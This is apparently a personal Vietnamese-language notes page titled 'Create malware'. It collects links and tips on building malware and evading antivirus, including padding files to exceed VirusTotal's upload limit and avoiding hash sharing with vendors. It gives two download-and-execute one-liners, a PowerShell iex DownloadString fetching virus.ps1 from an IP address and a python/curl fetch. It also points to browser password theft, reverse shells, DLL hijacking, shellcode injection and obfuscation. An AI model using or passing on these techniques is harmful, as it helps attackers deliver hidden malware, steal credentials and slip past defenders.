Create malware

# Tips chèn thêm rất nhiều byte 0 vào cuối để tăng kích thước lên trên 700MB, Virus total giới hạn kích thước tải lên là 650MB https://cookiearena.org/case-study/phan-tich-ma-doc-tan-cong-doanh-nghiep-ban-hang-online/ VirusTotal hay mách lẻo, nếu nó phát hiện phần mềm của chúng ta là độc hại. Nó sẽ chia sẻ hash cho tất cả các phần mềm AV khác được biết. Điều này tốt cho người dùng nhưng không tốt cho Pentester . Cho nên antiscan.me là lựa chọn tốt hơn (tuy rằng công cụ này cũng rất giỏi vòi tiền) https://quantrimang.com/cong-nghe/trojan-gia-lam-pdf-bang-phuong-phap-rlo-195731 fake pdf (anti virus blocked) https://viblo.asia/p/bypass-powershell-execution-policies-tren-windows-MG24BrER4z3 (kỹ thuật này vô hiệu hóa các phần mềm diệt Virus thông thường) ``` powershell -nop -c "iex (New-Object Net.WebClient).DownloadString ('http://10.0.37.216:8080/virus.ps1')" ``` ``` python -c "`curl https://raw.githubusercontent.com/Shengpy/test/main/a.py`" ``` ## password stealing from browser https://drx.home.blog/2018/07/20/tu-viet-chuong-trinh-danh-cap-password-duoc-luu-trong-chrome-bang-python/#more-122 https://github.com/ohyicong/decrypt-chrome-passwords ## Reverse shell https://systemweakness.com/ms-word-macros-with-powercat-reverse-shell-58b20983e0f0 https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/ ## dll hijacking https://crypt0ace.github.io/posts/DLL-Sideloading/ https://sec.vnpt.vn/2023/04/dll-proxying-for-persistence/ https://viblo.asia/p/share-libraries-hijacking-tren-linux-gAm5yEVX5db iso https://blog.sunggwanchoi.com/recreating-an-iso-payload-for-fun-and-no-profit/ ## Powershell https://medium.com/@huseyin.eksi/powershell-security-7039d73e32fd https://github.com/PowerShellMafia/PowerSploit ## Shellcode injection https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/ # bypass antivirus https://viblo.asia/p/cac-phuong-phap-bypass-av-co-ban-bWrZnQgvKxw?fbclid=IwAR0eoXpUIZRrPgTTEargMDwlJyrsBSkOQEuAsjPxP0ZAUzOrRAsezbyG7tM https://topdev.vn/blog/huong-dan-cai-dat-clamav-tren-linux-de-quet-virus-malware-trojan/ https://0xdf.gitlab.io/2020/02/01/htb-re.html https://github.com/danielbohannon/Invoke-Obfuscation #powershell obfuscation https://anonyviet.com/cach-hacker-bypass-av-xam-nhap-windows-voi-autoit/ https://www.batch-obfuscator.tk/ https://anonyviet.com/minh-da-bypass-av-xam-nhap-windows-10-voi-metasploit-va-python-nhu-the-nao/ https://docs.google.com/presentation/d/1Fdcbv9U1qywIZSl2AhXJAlx61pyEITKfcbbwpJMvkcQ/edit#slide=id.g8d8b1cad0d_1_27 1.Use non-malicious software in malicious ways (preferred) Instead of Metasploit’s psexec implementation, use PsExec.exe from Microsoft Instead of Mimikatz.exe, dump LSASS memory with Task Manager and extract passwords elsewhere Instead of hashdump, save out registry hives and extract hashes elsewhere Instead of meterpreter (at first), use SSH, Remote Desktop, mRemote-NG, TeamViewer, etc. 2.Add extra strings (from legitimate software) to increase the “goodness” score # Assembly shellcode Create a Shell_Bind_TCP Shellcode https://bohansec.com/2020/08/27/SLAE32-Assignment1/ Create a Shell_Reverse_TCP Shellcode https://bohansec.com/2020/08/30/SLAE32-Assignment2/ egg hunter https://bohansec.com/2020/09/01/SLAE32-Assignment3/ jump to that shell code address and execute encoding schema https://bohansec.com/2020/09/05/SLAE32-Assignment4/ Take up at least 3 shellcode examples created using msfvenom for linux x86 https://bohansec.com/2020/09/18/SLAE32-Assignment5/ Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching https://bohansec.com/2020/09/27/SLAE32-Assignment6/ Create a custom crypter like the one shown in the "crypters" video https://bohansec.com/2020/09/29/SLAE32-Assignment7/ # Read more https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking https://n1ght-w0lf.github.io/categories/#malware-analysis https://crypt0ace.github.io/